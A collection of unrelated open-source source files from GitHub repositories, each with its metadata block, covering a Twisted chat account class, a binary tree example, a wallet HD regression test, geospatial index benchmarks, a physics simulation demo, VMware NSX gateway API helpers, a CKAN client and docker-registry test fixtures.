def getPerson(self, name):
"""Person factory.
@param name: Name of the person on this account.
@type name: string
"""
person = self._persons.get(name)
if person is None:
person = self._personFactory(name, self)
self._persons[name] = person
return person
def _startLogOn(self, chatui):
"""Start the sign on process.
Factored out of L{logOn}.
@returntype: Deferred L{interfaces.IClient}
"""
raise NotImplementedError()
def _cb_logOn(self, client):
self._isConnecting = 0
self._isOnline = 1
self.client = client
return client
def _loginFailed(self, reason):
"""Errorback for L{logOn}.
@type reason: Failure
@returns: I{reason}, for further processing in the callback chain.
@returntype: Failure
"""
self._isConnecting = 0
self._isOnline = 0 # just in case
return reason
def _clientLost(self, client, reason):
self.client = None
self._isConnecting = 0
self._isOnline = 0
return reason
def __repr__(self):
return "<%s: %s (%s@%s:%s)>" % (self.__class__,
self.accountName,
self.username,
self.host,
self.port)
| {
"content_hash": "e652cacb3980530523e373e9ff037666",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 80,
"avg_line_length": 30.171641791044777,
"alnum_prop": 0.5750680187979224,
"repo_name": "hlzz/dotfiles",
"id": "be1368e22948783e5e555a86287a63dfb408480a",
"size": "8160",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "graphics/VTK-7.0.0/ThirdParty/Twisted/twisted/words/im/basesupport.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "AppleScript",
"bytes": "1240"
},
{
"name": "Arc",
"bytes": "38"
},
{
"name": "Assembly",
"bytes": "449468"
},
{
"name": "Batchfile",
"bytes": "16152"
},
{
"name": "C",
"bytes": "102303195"
},
{
"name": "C++",
"bytes": "155056606"
},
{
"name": "CMake",
"bytes": "7200627"
},
{
"name": "CSS",
"bytes": "179330"
},
{
"name": "Cuda",
"bytes": "30026"
},
{
"name": "D",
"bytes": "2152"
},
{
"name": "Emacs Lisp",
"bytes": "14892"
},
{
"name": "FORTRAN",
"bytes": "5276"
},
{
"name": "Forth",
"bytes": "3637"
},
{
"name": "GAP",
"bytes": "14495"
},
{
"name": "GLSL",
"bytes": "438205"
},
{
"name": "Gnuplot",
"bytes": "327"
},
{
"name": "Groff",
"bytes": "518260"
},
{
"name": "HLSL",
"bytes": "965"
},
{
"name": "HTML",
"bytes": "2003175"
},
{
"name": "Haskell",
"bytes": "10370"
},
{
"name": "IDL",
"bytes": "2466"
},
{
"name": "Java",
"bytes": "219109"
},
{
"name": "JavaScript",
"bytes": "1618007"
},
{
"name": "Lex",
"bytes": "119058"
},
{
"name": "Lua",
"bytes": "23167"
},
{
"name": "M",
"bytes": "1080"
},
{
"name": "M4",
"bytes": "292475"
},
{
"name": "Makefile",
"bytes": "7112810"
},
{
"name": "Matlab",
"bytes": "1582"
},
{
"name": "NSIS",
"bytes": "34176"
},
{
"name": "Objective-C",
"bytes": "65312"
},
{
"name": "Objective-C++",
"bytes": "269995"
},
{
"name": "PAWN",
"bytes": "4107117"
},
{
"name": "PHP",
"bytes": "2690"
},
{
"name": "Pascal",
"bytes": "5054"
},
{
"name": "Perl",
"bytes": "485508"
},
{
"name": "Pike",
"bytes": "1338"
},
{
"name": "Prolog",
"bytes": "5284"
},
{
"name": "Python",
"bytes": "16799659"
},
{
"name": "QMake",
"bytes": "89858"
},
{
"name": "Rebol",
"bytes": "291"
},
{
"name": "Ruby",
"bytes": "21590"
},
{
"name": "Scilab",
"bytes": "120244"
},
{
"name": "Shell",
"bytes": "2266191"
},
{
"name": "Slash",
"bytes": "1536"
},
{
"name": "Smarty",
"bytes": "1368"
},
{
"name": "Swift",
"bytes": "331"
},
{
"name": "Tcl",
"bytes": "1911873"
},
{
"name": "TeX",
"bytes": "11981"
},
{
"name": "Verilog",
"bytes": "3893"
},
{
"name": "VimL",
"bytes": "595114"
},
{
"name": "XSLT",
"bytes": "62675"
},
{
"name": "Yacc",
"bytes": "307000"
},
{
"name": "eC",
"bytes": "366863"
}
],
"symlink_target": ""
} |
from pythonds.trees.binaryTree import BinaryTree
import operator
x = BinaryTree('*')
x.insertLeft('+')
l = x.getLeftChild()
l.insertLeft(4)
l.insertRight(5)
x.insertRight(7)
def printexp(tree):
sVal = ""
if tree:
sVal = '(' + printexp(tree.getLeftChild())
sVal = sVal + str(tree.getRootVal())
sVal = sVal + printexp(tree.getRightChild())+')'
return sVal
def postordereval(tree):
opers = {'+':operator.add, '-':operator.sub, '*':operator.mul, '/':operator.truediv}
res1 = None
res2 = None
if tree:
res1 = postordereval(tree.getLeftChild())
res2 = postordereval(tree.getRightChild())
if res1 and res2:
return opers[tree.getRootVal()](res1,res2)
else:
return tree.getRootVal()
print(printexp(x))
print(postordereval(x))
| {
"content_hash": "6a8a5798de5aef0860f29179b9b0ce3e",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 86,
"avg_line_length": 23.5,
"alnum_prop": 0.6470588235294118,
"repo_name": "robin1885/algorithms-exercises-using-python",
"id": "ea41d9356024cdc7ce381cfcf4197fa438aaafc1",
"size": "799",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "source-code-from-author-book/Chapter6/treeexample.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "182896"
}
],
"symlink_target": ""
} |
"""Test Hierarchical Deterministic wallet function."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class WalletHDTest(BitcoinTestFramework):
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain_clean(self.options.tmpdir, 2)
def setup_network(self):
self.nodes = start_nodes(2, self.options.tmpdir, [['-usehd=0'], ['-usehd=1', '-keypool=0']])
self.is_network_split = False
connect_nodes_bi(self.nodes, 0, 1)
self.is_network_split=False
self.sync_all()
def run_test (self):
tmpdir = self.options.tmpdir
# Make sure can't switch off usehd after wallet creation
stop_node(self.nodes[1],1)
try:
start_node(1, self.options.tmpdir, ['-usehd=0'])
raise AssertionError("Must not allow to turn off HD on an already existing HD wallet")
except Exception as e:
assert("yxomcoind exited with status 1 during initialization" in str(e))
# assert_start_raises_init_error(1, self.options.tmpdir, ['-usehd=0'], 'already existing HD wallet')
# self.nodes[1] = start_node(1, self.options.tmpdir, self.node_args[1])
self.nodes[1] = start_node(1, self.options.tmpdir, ['-usehd=1', '-keypool=0'])
connect_nodes_bi(self.nodes, 0, 1)
# Make sure we use hd, keep chainid
chainid = self.nodes[1].getwalletinfo()['hdchainid']
assert_equal(len(chainid), 64)
# create an internal key
change_addr = self.nodes[1].getrawchangeaddress()
change_addrV= self.nodes[1].validateaddress(change_addr);
assert_equal(change_addrV["hdkeypath"], "m/44'/1'/0'/1/0") #first internal child key
# Import a non-HD private key in the HD wallet
non_hd_add = self.nodes[0].getnewaddress()
self.nodes[1].importprivkey(self.nodes[0].dumpprivkey(non_hd_add))
# This should be enough to keep the master key and the non-HD key
self.nodes[1].backupwallet(tmpdir + "/hd.bak")
#self.nodes[1].dumpwallet(tmpdir + "/hd.dump")
# Derive some HD addresses and remember the last
# Also send funds to each add
self.nodes[0].generate(101)
hd_add = None
num_hd_adds = 300
for i in range(num_hd_adds):
hd_add = self.nodes[1].getnewaddress()
hd_info = self.nodes[1].validateaddress(hd_add)
assert_equal(hd_info["hdkeypath"], "m/44'/1'/0'/0/"+str(i+1))
assert_equal(hd_info["hdchainid"], chainid)
self.nodes[0].sendtoaddress(hd_add, 1)
self.nodes[0].generate(1)
self.nodes[0].sendtoaddress(non_hd_add, 1)
self.nodes[0].generate(1)
# create an internal key (again)
change_addr = self.nodes[1].getrawchangeaddress()
change_addrV= self.nodes[1].validateaddress(change_addr);
assert_equal(change_addrV["hdkeypath"], "m/44'/1'/0'/1/1") #second internal child key
self.sync_all()
assert_equal(self.nodes[1].getbalance(), num_hd_adds + 1)
print("Restore backup ...")
stop_node(self.nodes[1],1)
os.remove(self.options.tmpdir + "/node1/regtest/wallet.dat")
shutil.copyfile(tmpdir + "/hd.bak", tmpdir + "/node1/regtest/wallet.dat")
self.nodes[1] = start_node(1, self.options.tmpdir, ['-usehd=1', '-keypool=0'])
#connect_nodes_bi(self.nodes, 0, 1)
# Assert that derivation is deterministic
hd_add_2 = None
for _ in range(num_hd_adds):
hd_add_2 = self.nodes[1].getnewaddress()
hd_info_2 = self.nodes[1].validateaddress(hd_add_2)
assert_equal(hd_info_2["hdkeypath"], "m/44'/1'/0'/0/"+str(_+1))
assert_equal(hd_info_2["hdchainid"], chainid)
assert_equal(hd_add, hd_add_2)
# Needs rescan
stop_node(self.nodes[1],1)
self.nodes[1] = start_node(1, self.options.tmpdir, ['-usehd=1', '-keypool=0', '-rescan'])
#connect_nodes_bi(self.nodes, 0, 1)
assert_equal(self.nodes[1].getbalance(), num_hd_adds + 1)
# send a tx and make sure its using the internal chain for the changeoutput
txid = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1)
outs = self.nodes[1].decoderawtransaction(self.nodes[1].gettransaction(txid)['hex'])['vout'];
keypath = ""
for out in outs:
if out['value'] != 1:
keypath = self.nodes[1].validateaddress(out['scriptPubKey']['addresses'][0])['hdkeypath']
assert_equal(keypath[0:13], "m/44'/1'/0'/1")
if __name__ == '__main__':
WalletHDTest().main ()
| {
"content_hash": "c581f6a7c221e0017b9bd2973a162a0d",
"timestamp": "",
"source": "github",
"line_count": 107,
"max_line_length": 108,
"avg_line_length": 44.08411214953271,
"alnum_prop": 0.6109815560737757,
"repo_name": "YxomNPO/YxomCoin",
"id": "d7f6553cd9918b1b9bbdfa2d199470e2fcf3121c",
"size": "4997",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "qa/rpc-tests/wallet-hd.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "M4",
"bytes": "145197"
},
{
"name": "Makefile",
"bytes": "63726"
},
{
"name": "Python",
"bytes": "741915"
},
{
"name": "QMake",
"bytes": "2059"
},
{
"name": "Roff",
"bytes": "3828"
},
{
"name": "Shell",
"bytes": "27654"
}
],
"symlink_target": ""
} |
"""Tests for filesystem elements, including Foxhound and related objects.
"""
import datreant as dtr
import pytest
import os
import py.path
class TestFoxhound:
"""Test Foxhound functionality"""
@pytest.fixture
def treant(self, tmpdir):
with tmpdir.as_cwd():
t = dtr.treants.Container('testtreant')
return t
@pytest.fixture
def group(self, tmpdir):
with tmpdir.as_cwd():
g = dtr.Group('testgroup')
return g
| {
"content_hash": "64da50b8fb9c0344b68dde236949ae7a",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 73,
"avg_line_length": 20.333333333333332,
"alnum_prop": 0.6311475409836066,
"repo_name": "andreabedini/datreant",
"id": "6b83810385f03b91e02dbc0bf058b677bd89132a",
"size": "488",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "datreant/tests/test_filesystem.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "164526"
}
],
"symlink_target": ""
} |
from shapely.geometry import Point
from geopandas import read_file, datasets, GeoSeries
# Derive list of valid query predicates based on underlying index backend;
# we have to create a non-empty instance of the index to get these
index = GeoSeries([Point(0, 0)]).sindex
predicates = sorted(p for p in index.valid_query_predicates if p is not None)
geom_types = ("mixed", "points", "polygons")
def generate_test_df():
world = read_file(datasets.get_path("naturalearth_lowres"))
capitals = read_file(datasets.get_path("naturalearth_cities"))
countries = world.to_crs("epsg:3395")[["geometry"]]
capitals = capitals.to_crs("epsg:3395")[["geometry"]]
mixed = capitals.append(countries) # get a mix of geometries
points = capitals
polygons = countries
# filter out invalid geometries
data = {
"mixed": mixed[mixed.is_valid],
"points": points[points.is_valid],
"polygons": polygons[polygons.is_valid],
}
# ensure index is pre-generated
for data_type in data.keys():
data[data_type].sindex.query(data[data_type].geometry.values.data[0])
return data
class BenchIntersection:
param_names = ["input_geom_type", "tree_geom_type"]
params = [
geom_types,
geom_types,
]
def setup(self, *args):
self.data = generate_test_df()
# cache bounds so that bound creation is not counted in benchmarks
self.bounds = {
data_type: [g.bounds for g in self.data[data_type].geometry]
for data_type in self.data.keys()
}
def time_intersects(self, input_geom_type, tree_geom_type):
tree = self.data[tree_geom_type].sindex
for bounds in self.bounds[input_geom_type]:
tree.intersection(bounds)
class BenchIndexCreation:
param_names = ["tree_geom_type"]
params = [
geom_types,
]
def setup(self, *args):
self.data = generate_test_df()
def time_index_creation(self, tree_geom_type):
"""Time creation of spatial index.
Note: requires running a single query to ensure that
lazy-building indexes are actually built.
"""
# Note: the GeoDataFram._sindex_generated attribute will
# be removed by GH#1444 but is kept here (in the benchmarks
# so that we can compare pre GH#1444 to post GH#1444 if needed
self.data[tree_geom_type]._sindex_generated = None
self.data[tree_geom_type].geometry.values._sindex = None
tree = self.data[tree_geom_type].sindex
# also do a single query to ensure the index is actually
# generated and used
tree.query(self.data[tree_geom_type].geometry.values.data[0])
class BenchQuery:
param_names = ["predicate", "input_geom_type", "tree_geom_type"]
params = [
predicates,
geom_types,
geom_types,
]
def setup(self, *args):
self.data = generate_test_df()
def time_query_bulk(self, predicate, input_geom_type, tree_geom_type):
self.data[tree_geom_type].sindex.query_bulk(
self.data[input_geom_type].geometry.values.data,
predicate=predicate,
)
def time_query(self, predicate, input_geom_type, tree_geom_type):
tree = self.data[tree_geom_type].sindex
for geom in self.data[input_geom_type].geometry.values.data:
tree.query(geom, predicate=predicate)
| {
"content_hash": "2b5d87d0c6fd9a13369f980185e71fd1",
"timestamp": "",
"source": "github",
"line_count": 104,
"max_line_length": 77,
"avg_line_length": 32.88461538461539,
"alnum_prop": 0.6429824561403509,
"repo_name": "geopandas/geopandas",
"id": "24fac10e6883271ff9f83b45e77fe10c79e788d4",
"size": "3420",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "benchmarks/sindex.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "32111"
},
{
"name": "Python",
"bytes": "1304336"
},
{
"name": "Shell",
"bytes": "754"
}
],
"symlink_target": ""
} |
def main():
pass
if __name__ == '__main__':
main()
import os
import math
import ChronoEngine_python_core as chrono
import ChronoEngine_python_postprocess as postprocess
# ---------------------------------------------------------------------
#
# Create the simulation system.
# (Do not create parts and constraints programmatically here, we will
# load a mechanism from file)
my_system = chrono.ChSystem()
# Set the collision margins. This is expecially important for very large or
# very small objects (as in this example)! Do this before creating shapes.
chrono.ChCollisionModel.SetDefaultSuggestedEnvelope(0.001);
chrono.ChCollisionModel.SetDefaultSuggestedMargin(0.001);
# ---------------------------------------------------------------------
#
# load the file generated by the SolidWorks CAD plugin
# and add it to the ChSystem
#
print ("Loading C::E scene...");
exported_items = chrono.ImportSolidWorksSystem('../../../data/solid_works/swiss_escapement')
print ("...done!");
# Print exported items
for my_item in exported_items:
print (my_item.GetName())
# Add items to the physical system
for my_item in exported_items:
my_system.Add(my_item)
# ---------------------------------------------------------------------
#
# Render a short animation by generating scripts
# to be used with POV-Ray
#
pov_exporter = postprocess.ChPovRay(my_system)
# Sets some file names for in-out processes.
pov_exporter.SetTemplateFile ("../../../data/_template_POV.pov")
pov_exporter.SetOutputScriptFile ("rendering_frames.pov")
if not os.path.exists("output"):
os.mkdir("output")
if not os.path.exists("anim"):
os.mkdir("anim")
pov_exporter.SetOutputDataFilebase("output/my_state")
pov_exporter.SetPictureFilebase("anim/picture")
# Sets the viewpoint, aimed point, lens angle
pov_exporter.SetCamera(chrono.ChVectorD(0.2,0.3,0.5), chrono.ChVectorD(0,0,0), 35)
# Sets the default ambient light and default light lamp
pov_exporter.SetAmbientLight(chrono.ChColor(1,1,0.9))
pov_exporter.SetLight(chrono.ChVectorD(-2,2,-1), chrono.ChColor(0.9,0.9,1.1), True)
# Sets other settings
pov_exporter.SetPictureSize(640,480)
pov_exporter.SetAmbientLight(chrono.ChColor(2,2,2))
# If wanted, turn on the rendering of COGs, reference frames, contacts:
#pov_exporter.SetShowCOGs (1, 0.05)
#pov_exporter.SetShowFrames(1, 0.02)
#pov_exporter.SetShowLinks(1, 0.03)
#pov_exporter.SetShowContacts(1,
# postprocess.ChPovRay.SYMBOL_VECTOR_SCALELENGTH,
# 0.01, # scale
# 0.0007, # width
# 0.1, # max size
# 1,0,0.5 ) # colormap on, blue at 0, red at 0.5
# Add additional POV objects/lights/materials in the following way, entering
# an optional text using the POV scene description laguage. This will be
# appended to the generated .pov file.
# For multi-line strings, use the python ''' easy string delimiter.
pov_exporter.SetCustomPOVcommandsScript(
'''
light_source{ <1,3,1.5> color rgb<0.9,0.9,0.8> }
''')
# Tell which physical items you want to render
pov_exporter.AddAll()
# 1) Create the two .pov and .ini files for POV-Ray (this must be done
# only once at the beginning of the simulation).
pov_exporter.ExportScript()
# Configure the solver, if needed
my_system.SetSolverType(chrono.ChSolver.Type_BARZILAIBORWEIN)
my_system.SetMaxItersSolverSpeed(40)
my_system.SetMaxPenetrationRecoverySpeed(0.002)
my_system.Set_G_acc(chrono.ChVectorD(0,-9.8,-9.80))
# Perform a short simulation
nstep =0
while (my_system.GetChTime() < 1.2) :
my_system.DoStepDynamics(0.002)
#if math.fmod(nstep,10) ==0 :
print ('time=', my_system.GetChTime() )
# 2) Create the incremental nnnn.dat and nnnn.pov files that will be load
# by the pov .ini script in POV-Ray (do this at each simulation timestep)
pov_exporter.ExportData()
nstep = nstep +1
| {
"content_hash": "d089c693a4a8c07fb3c20e8033a34c0f",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 92,
"avg_line_length": 30.73643410852713,
"alnum_prop": 0.6610340479192938,
"repo_name": "tjolsen/chrono",
"id": "8b455de89219650b451cd77e9ddf5a407bf68e48",
"size": "4297",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "src/demos/python/demo_solidworks.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "2059577"
},
{
"name": "C++",
"bytes": "16034231"
},
{
"name": "CMake",
"bytes": "369296"
},
{
"name": "CSS",
"bytes": "170229"
},
{
"name": "Cuda",
"bytes": "263283"
},
{
"name": "GLSL",
"bytes": "4731"
},
{
"name": "HTML",
"bytes": "8318"
},
{
"name": "Inno Setup",
"bytes": "23502"
},
{
"name": "JavaScript",
"bytes": "4731"
},
{
"name": "Objective-C",
"bytes": "46356"
},
{
"name": "POV-Ray SDL",
"bytes": "23109"
},
{
"name": "Python",
"bytes": "106362"
}
],
"symlink_target": ""
} |
from oslo_serialization import jsonutils
from neutron.openstack.common import log
from neutron.plugins.vmware.api_client import exception as api_exc
from neutron.plugins.vmware.common import exceptions as nsx_exc
from neutron.plugins.vmware.common import utils
from neutron.plugins.vmware import nsxlib
from neutron.plugins.vmware.nsxlib import switch
HTTP_GET = "GET"
HTTP_POST = "POST"
HTTP_DELETE = "DELETE"
HTTP_PUT = "PUT"
GWSERVICE_RESOURCE = "gateway-service"
TRANSPORTNODE_RESOURCE = "transport-node"
LOG = log.getLogger(__name__)
def create_l2_gw_service(cluster, tenant_id, display_name, devices):
"""Create a NSX Layer-2 Network Gateway Service.
:param cluster: The target NSX cluster
:param tenant_id: Identifier of the Openstack tenant for which
the gateway service.
:param display_name: Descriptive name of this gateway service
:param devices: List of transport node uuids (and network
interfaces on them) to use for the network gateway service
:raise NsxApiException: if there is a problem while communicating
with the NSX controller
"""
# NOTE(salvatore-orlando): This is a little confusing, but device_id in
# NSX is actually the identifier a physical interface on the gateway
# device, which in the Neutron API is referred as interface_name
gateways = [{"transport_node_uuid": device['id'],
"device_id": device['interface_name'],
"type": "L2Gateway"} for device in devices]
gwservice_obj = {
"display_name": utils.check_and_truncate(display_name),
"tags": utils.get_tags(os_tid=tenant_id),
"gateways": gateways,
"type": "L2GatewayServiceConfig"
}
return nsxlib.do_request(
HTTP_POST, nsxlib._build_uri_path(GWSERVICE_RESOURCE),
jsonutils.dumps(gwservice_obj), cluster=cluster)
def plug_l2_gw_service(cluster, lswitch_id, lport_id,
gateway_id, vlan_id=None):
"""Plug a Layer-2 Gateway Attachment object in a logical port."""
att_obj = {'type': 'L2GatewayAttachment',
'l2_gateway_service_uuid': gateway_id}
if vlan_id:
att_obj['vlan_id'] = vlan_id
return switch.plug_interface(cluster, lswitch_id, lport_id, att_obj)
def get_l2_gw_service(cluster, gateway_id):
return nsxlib.do_request(
HTTP_GET, nsxlib._build_uri_path(GWSERVICE_RESOURCE,
resource_id=gateway_id),
cluster=cluster)
def get_l2_gw_services(cluster, tenant_id=None,
fields=None, filters=None):
actual_filters = dict(filters or {})
if tenant_id:
actual_filters['tag'] = tenant_id
actual_filters['tag_scope'] = 'os_tid'
return nsxlib.get_all_query_pages(
nsxlib._build_uri_path(GWSERVICE_RESOURCE,
filters=actual_filters),
cluster)
def update_l2_gw_service(cluster, gateway_id, display_name):
# TODO(salvatore-orlando): Allow updates for gateways too
gwservice_obj = get_l2_gw_service(cluster, gateway_id)
if not display_name:
# Nothing to update
return gwservice_obj
gwservice_obj["display_name"] = utils.check_and_truncate(display_name)
return nsxlib.do_request(HTTP_PUT,
nsxlib._build_uri_path(GWSERVICE_RESOURCE,
resource_id=gateway_id),
jsonutils.dumps(gwservice_obj), cluster=cluster)
def delete_l2_gw_service(cluster, gateway_id):
nsxlib.do_request(HTTP_DELETE,
nsxlib._build_uri_path(GWSERVICE_RESOURCE,
resource_id=gateway_id),
cluster=cluster)
def _build_gateway_device_body(tenant_id, display_name, neutron_id,
connector_type, connector_ip,
client_certificate, tz_uuid):
connector_type_mappings = {
utils.NetworkTypes.STT: "STTConnector",
utils.NetworkTypes.GRE: "GREConnector",
utils.NetworkTypes.BRIDGE: "BridgeConnector",
'ipsec%s' % utils.NetworkTypes.STT: "IPsecSTT",
'ipsec%s' % utils.NetworkTypes.GRE: "IPsecGRE"}
nsx_connector_type = connector_type_mappings.get(connector_type)
body = {"display_name": utils.check_and_truncate(display_name),
"tags": utils.get_tags(os_tid=tenant_id,
q_gw_dev_id=neutron_id),
"admin_status_enabled": True}
if connector_ip and nsx_connector_type:
body["transport_connectors"] = [
{"transport_zone_uuid": tz_uuid,
"ip_address": connector_ip,
"type": nsx_connector_type}]
if client_certificate:
body["credential"] = {"client_certificate":
{"pem_encoded": client_certificate},
"type": "SecurityCertificateCredential"}
return body
def create_gateway_device(cluster, tenant_id, display_name, neutron_id,
tz_uuid, connector_type, connector_ip,
client_certificate):
body = _build_gateway_device_body(tenant_id, display_name, neutron_id,
connector_type, connector_ip,
client_certificate, tz_uuid)
try:
return nsxlib.do_request(
HTTP_POST, nsxlib._build_uri_path(TRANSPORTNODE_RESOURCE),
jsonutils.dumps(body, sort_keys=True), cluster=cluster)
except api_exc.InvalidSecurityCertificate:
raise nsx_exc.InvalidSecurityCertificate()
def update_gateway_device(cluster, gateway_id, tenant_id,
display_name, neutron_id,
tz_uuid, connector_type, connector_ip,
client_certificate):
body = _build_gateway_device_body(tenant_id, display_name, neutron_id,
connector_type, connector_ip,
client_certificate, tz_uuid)
try:
return nsxlib.do_request(
HTTP_PUT,
nsxlib._build_uri_path(TRANSPORTNODE_RESOURCE,
resource_id=gateway_id),
jsonutils.dumps(body, sort_keys=True), cluster=cluster)
except api_exc.InvalidSecurityCertificate:
raise nsx_exc.InvalidSecurityCertificate()
def delete_gateway_device(cluster, device_uuid):
return nsxlib.do_request(HTTP_DELETE,
nsxlib._build_uri_path(TRANSPORTNODE_RESOURCE,
device_uuid),
cluster=cluster)
def get_gateway_device_status(cluster, device_uuid):
status_res = nsxlib.do_request(HTTP_GET,
nsxlib._build_uri_path(
TRANSPORTNODE_RESOURCE,
device_uuid,
extra_action='status'),
cluster=cluster)
# Returns the connection status
return status_res['connection']['connected']
def get_gateway_devices_status(cluster, tenant_id=None):
if tenant_id:
gw_device_query_path = nsxlib._build_uri_path(
TRANSPORTNODE_RESOURCE,
fields="uuid,tags",
relations="TransportNodeStatus",
filters={'tag': tenant_id,
'tag_scope': 'os_tid'})
else:
gw_device_query_path = nsxlib._build_uri_path(
TRANSPORTNODE_RESOURCE,
fields="uuid,tags",
relations="TransportNodeStatus")
response = nsxlib.get_all_query_pages(gw_device_query_path, cluster)
results = {}
for item in response:
results[item['uuid']] = (item['_relations']['TransportNodeStatus']
['connection']['connected'])
return results
| {
"content_hash": "4d547997d8252fde14351c546b803d25",
"timestamp": "",
"source": "github",
"line_count": 196,
"max_line_length": 77,
"avg_line_length": 40.88265306122449,
"alnum_prop": 0.5897915886684139,
"repo_name": "cloudbase/neutron-virtualbox",
"id": "5e20d2d51c3ce9623319377b9160e278b3face3c",
"size": "8642",
"binary": false,
"copies": "1",
"ref": "refs/heads/virtualbox_agent",
"path": "neutron/plugins/vmware/nsxlib/l2gateway.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "1043"
},
{
"name": "Python",
"bytes": "8448838"
},
{
"name": "Shell",
"bytes": "12510"
}
],
"symlink_target": ""
} |
from mezzanine.utils.email import send_mail_template
from mezzanine.conf import settings
def send_invite_code_mail(code, site_url, login_url):
context = {
'code': code,
'site_name': settings.SITE_TITLE,
'site_url': site_url,
'login_url': login_url,
}
send_mail_template(
"Your Invitation to %s" % settings.SITE_TITLE,
"invites/send_invite_email",
settings.DEFAULT_FROM_EMAIL,
code.registered_to,
context=context,
fail_silently=False,
)
| {
"content_hash": "389c4a353195096aaa26f5a4e7054132",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 54,
"avg_line_length": 26.75,
"alnum_prop": 0.6149532710280374,
"repo_name": "averagehuman/mezzanine-invites",
"id": "22664820988d9cb053d139af0d215c3db5e28a4f",
"size": "536",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "invites/utils.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "51079"
}
],
"symlink_target": ""
} |
import requests
class Parla(object):
r = requests
api_key = None
version = 3
base_url = 'http://demo.ckan.org/api/{version}/action/'
resp = None # response from server
resp_status = None # shortcut to response.status_code
resp_headers = None # shortcut to response.status_code
resp_json = None # shortcut to response.json()
results = [] # shortcut to resp.json().get('results', [])
help = None # shortcut to provided api help
def __init__(self, api_key=None, *args, **kwargs):
self.api_key = api_key
self.resp = None
self.resp_status = None
self.resp_headers = None
self.resp_json = None
self.results = []
self.help = None
self.version = kwargs.get('version', self.version)
@property
def headers(self):
"""
Allow custom authorisation header to be passed in
"""
return {'authorization': self.api_key} if self.api_key is not None else None
@property
def endpoint(self):
base_url = self.base_url.format(version=self.version) # allow user to override the version
return '%s%s' % (base_url, self.action)
def response(self, resp):
self.resp = resp
self.resp_status = resp.status_code
self.resp_headers = resp.headers
self.resp_json = resp.json()
self.results = [] # reset
self.help = None # reset
if self.resp_status in [200] and 'result' in self.resp_json:
self.results = self.resp_json.get('result', [])
if 'help' in self.resp_json:
self.help = self.resp_json.get('help', None)
return resp
def get(self, **kwargs):
self.response(self.r.get(self.endpoint, params=kwargs, headers=self.headers))
return self.results
class Packages(Parla):
action = 'package_list'
def __init__(self, *args, **kwargs):
self.action = 'package_list' # reset
def search(self, q, **kwargs):
self.action = 'package_search'
return super(Packages, self).get(q=q, **kwargs)
class Groups(Parla):
action = 'group_list'
class Tags(Parla):
action = 'group_list'
class Resource(Parla):
action = 'resource_search'
def get(self, q, n='name' , **kwargs):
q = '%s:%s' % (n, q) # build search query
return super(Resource, self).get(query=q, **kwargs)
| {
"content_hash": "d9241b17e9707d9ac152655c47cde38d",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 99,
"avg_line_length": 29.24390243902439,
"alnum_prop": 0.5963302752293578,
"repo_name": "rosscdh/ckan-parliament-uk",
"id": "9a0538b29178636a56663a36edabbaf11d909df1",
"size": "2422",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ckan_sdk/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1054"
}
],
"symlink_target": ""
} |
from urllib.parse import quote
import pytest
from tests.functional import get_logger
from tests.functional.services.api.conftest import USER_API_CONFS
from tests.functional.services.api.registries import get_registry_info
from tests.functional.services.utils.http_utils import (
RequestFailedError,
http_del,
http_post,
)
_logger = get_logger(__name__)
@pytest.fixture(scope="session", autouse=True)
def add_image_to_local_registry(docker_client):
"""
Pull alpine:latest to local environment, and re-tag it for the local docker-registry
Note: if the docker registry run by scripts/ci/docker-compose-ci.yaml is not up,
this will fail
"""
registry_info = get_registry_info()
_logger.info("Pulling alpine:latest image from remote")
docker_client.images.pull("alpine:latest")
_logger.info("Re-tagging as the local docker registry's image")
local_image = "{}/alpine".format(registry_info["host"])
rc = docker_client.api.tag("alpine:latest", local_image, "latest")
if not rc:
raise RequestFailedError(rc, "docker_client:tag", None)
# Login to the Local Registry (running from scripts/ci/docker-compose-ci.yaml)
_logger.info("Ensure we are logged into the local docker registry")
docker_client.login(
username=registry_info["user"],
password=registry_info["pass"],
registry=registry_info["host"],
)
_logger.info("Push the re-tagged image to the local docker registry")
docker_client.images.push(local_image, "latest")
@pytest.fixture(scope="class", params=USER_API_CONFS)
def add_and_teardown_registry(request):
registry_info = get_registry_info()
registry_payload = {
"registry": registry_info["service_name"],
"registry_name": registry_info["host"].split(":")[0],
"registry_pass": registry_info["pass"],
"registry_type": "docker_v2",
"registry_user": registry_info["user"],
"registry_verify": False,
}
_logger.info("Adding Registry. APIConf={}".format(str(request.param.__name__)))
add_registry_resp = http_post(
["registries"], registry_payload, config=request.param
)
if add_registry_resp.code != 200:
raise RequestFailedError(
add_registry_resp.url, add_registry_resp.code, add_registry_resp.body
)
def remove_registry():
_logger.info(
"Removing Registry. APIConf={}".format(str(request.param.__name__))
)
remove_resp = http_del(
["registries", quote(registry_info["service_name"])], config=request.param
)
if remove_resp.code != 200:
raise RequestFailedError(
remove_resp.url,
remove_resp.code,
"" if not hasattr(remove_resp, "body") else remove_resp.body,
)
